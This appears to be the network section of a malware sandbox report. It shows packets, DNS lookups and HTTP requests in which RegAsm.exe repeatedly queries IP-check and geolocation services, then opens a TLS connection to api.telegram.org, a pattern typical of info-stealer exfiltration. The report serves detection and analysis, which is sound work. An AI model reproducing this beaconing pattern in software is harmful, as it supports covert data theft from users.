                                        Sep 9, 2024 08:55:16.904515028 CEST49718443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:16.907978058 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:16.913168907 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.202359915 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.205106974 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205158949 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.205246925 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205569029 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.205579996 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.251451015 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.666810989 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.668876886 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.668908119 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814291000 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814393044 CEST44349719188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:17.814450026 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.814990997 CEST49719443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:17.819384098 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.824527025 CEST8049713132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.824604988 CEST4971380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.830879927 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.835700035 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:17.835786104 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.847739935 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:17.852525949 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:18.599803925 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:18.601231098 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601277113 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.601346970 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601608992 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601622105 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.642108917 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.075015068 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.076679945 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.076699018 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218861103 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218976974 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.219048977 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.219679117 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.223922014 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.225599051 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.228890896 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.228972912 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.230420113 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.230499029 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.232568026 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.237287045 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.121956110 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.123646975 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.123694897 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.123765945 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124095917 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124114990 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.173446894 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.579633951 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.581279039 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.581298113 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713253975 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713342905 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713392973 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.713865995 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.716948986 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.718267918 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.722095013 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.722168922 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723037004 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.723129034 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723191023 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.727931976 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.497507095 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.499212027 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499255896 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.499324083 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499625921 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499638081 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.548357010 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:23.975264072 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.976938009 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.976957083 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112828016 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112929106 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112987995 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.113500118 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.117928982 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.122826099 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:24.122936010 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.123039961 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.128107071 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.702794075 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.704144955 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704178095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.704245090 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704500914 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704516888 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.751498938 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.167380095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.169081926 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.169101000 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308089972 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308163881 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308212996 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.309263945 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.313462019 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.314685106 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319525957 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319572926 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319619894 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319683075 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319776058 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.325062990 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:30.103023052 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:30.118957043 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:30.123934984 CEST8049730132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:30.124037027 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:30.124146938 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:30.129076004 CEST8049730132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:30.157712936 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.020287991 CEST8049730132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:33.020726919 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.021675110 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.021703959 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.021784067 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.022049904 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.022064924 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.026016951 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:33.026082039 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.063975096 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.476311922 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.477986097 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.478005886 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.601686954 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.601794958 CEST44349731188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:33.601847887 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.602330923 CEST49731443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:33.605328083 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.606441975 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.610419035 CEST8049730132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:33.610483885 CEST4973080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.611253977 CEST8049732132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:33.611314058 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.611428976 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:33.616280079 CEST8049732132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:34.359699965 CEST8049732132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:34.361210108 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.361246109 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.361306906 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.361675024 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.361690998 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.407720089 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:34.826966047 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.828547001 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.828563929 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.949242115 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.949340105 CEST44349733188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:34.949502945 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.949912071 CEST49733443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:34.960047960 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:34.965131044 CEST8049732132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:34.965190887 CEST4973280192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:34.968084097 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:34.968117952 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:34.968179941 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:34.968717098 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:34.968733072 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.575061083 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.575125933 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:35.576986074 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:35.576992035 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.577229977 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.578680038 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:35.624509096 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.815598965 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.815675974 CEST44349734149.154.167.220192.168.2.6
                                        Sep 9, 2024 08:55:35.815859079 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:35.816236973 CEST49734443192.168.2.6149.154.167.220
                                        Sep 9, 2024 08:55:41.053167105 CEST4972580192.168.2.6132.226.8.169

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 9, 2024 08:54:55.446717024 CEST5174753192.168.2.61.1.1.1
                                        Sep 9, 2024 08:54:55.527879000 CEST53517471.1.1.1192.168.2.6
                                        Sep 9, 2024 08:55:08.609030008 CEST5780253192.168.2.61.1.1.1
                                        Sep 9, 2024 08:55:08.616452932 CEST53578021.1.1.1192.168.2.6
                                        Sep 9, 2024 08:55:16.247685909 CEST5938353192.168.2.61.1.1.1
                                        Sep 9, 2024 08:55:16.256944895 CEST53593831.1.1.1192.168.2.6
                                        Sep 9, 2024 08:55:34.960860014 CEST5752053192.168.2.61.1.1.1
                                        Sep 9, 2024 08:55:34.967478037 CEST53575201.1.1.1192.168.2.6
                                        Sep 9, 2024 08:55:38.570733070 CEST5352874162.159.36.2192.168.2.6
                                        Sep 9, 2024 08:55:39.069169998 CEST53568491.1.1.1192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 9, 2024 08:54:55.446717024 CEST192.168.2.61.1.1.10xb23Standard query (0)eg-mart.comA (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.609030008 CEST192.168.2.61.1.1.10x655cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:16.247685909 CEST192.168.2.61.1.1.10xd9d0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:34.960860014 CEST192.168.2.61.1.1.10xc23dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 9, 2024 08:54:55.527879000 CEST1.1.1.1192.168.2.60xb23No error (0)eg-mart.com135.181.160.46A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:08.616452932 CEST1.1.1.1192.168.2.60x655cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:16.256944895 CEST1.1.1.1192.168.2.60xd9d0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:16.256944895 CEST1.1.1.1192.168.2.60xd9d0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                        Sep 9, 2024 08:55:34.967478037 CEST1.1.1.1192.168.2.60xc23dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • eg-mart.com
                                        • reallyfreegeoip.org
                                        • api.telegram.org
                                        • checkip.dyndns.org

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.649713132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:08.627346992 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Sep 9, 2024 08:55:14.479773045 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:14 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Sep 9, 2024 08:55:14.484637976 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Sep 9, 2024 08:55:16.208054066 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:16 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Sep 9, 2024 08:55:16.907978058 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Sep 9, 2024 08:55:17.202359915 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:17 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.649720132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:17.847739935 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Sep 9, 2024 08:55:18.599803925 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:18 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.649723132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:19.232568026 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Sep 9, 2024 08:55:21.121956110 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:20 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.649725132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:21.723191023 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Sep 9, 2024 08:55:23.497507095 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:23 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.649727132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:24.123039961 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Sep 9, 2024 08:55:25.702794075 CEST272INHTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 06:55:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.649729132.226.8.169802432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 9, 2024 08:55:26.319776058 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Sep 9, 2024 08:55:30.103023052 CEST697INHTTP/1.1 504 Gateway Time-out
                                        Date: Mon, 09 Sep 2024 06:55:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 557
                                        Connection: keep-alive
